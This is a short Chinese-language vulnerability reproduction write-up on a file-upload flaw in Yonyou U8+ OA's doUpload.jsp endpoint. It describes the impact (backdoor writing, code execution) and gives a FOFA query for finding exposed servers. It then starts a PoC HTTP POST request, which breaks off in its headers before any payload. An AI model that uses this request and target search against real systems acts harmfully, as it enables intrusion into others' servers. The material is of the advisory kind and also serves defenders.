用友U8+OA doUpload.jsp 文件上传漏洞复现

0x01 产品简介

用友U8+ OA经过20多年的市场锤炼，不断贴近客户需求，以全新UAP为平台，应对中型及成长型企业客户群的发展，提供的是一整套企业级数智化升级解决方案，为成长型企业构建精细管理、产业链协同、社交化运营为一体的企业互联网经营管理平台，助力企业应势而变，赢得未来。

0x02 漏洞概述

用友U8+ OA  doUpload.jsp 接口存在文件上传漏洞，攻击者可通过该漏洞在服务器端写入后门文件，任意执行代码，获取服务器权限，进而控制整个 web 服务器。

0x03 影响范围

用友U8+OA 基础版+企业版

0x04 复现环境

FOFA："用友U8-OA" && body="yyoa"

0x05 漏洞复现

PoC

POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryb9CPBiwbTONqdE5v
Accept: text/html,application/xhtml+xml,application/xm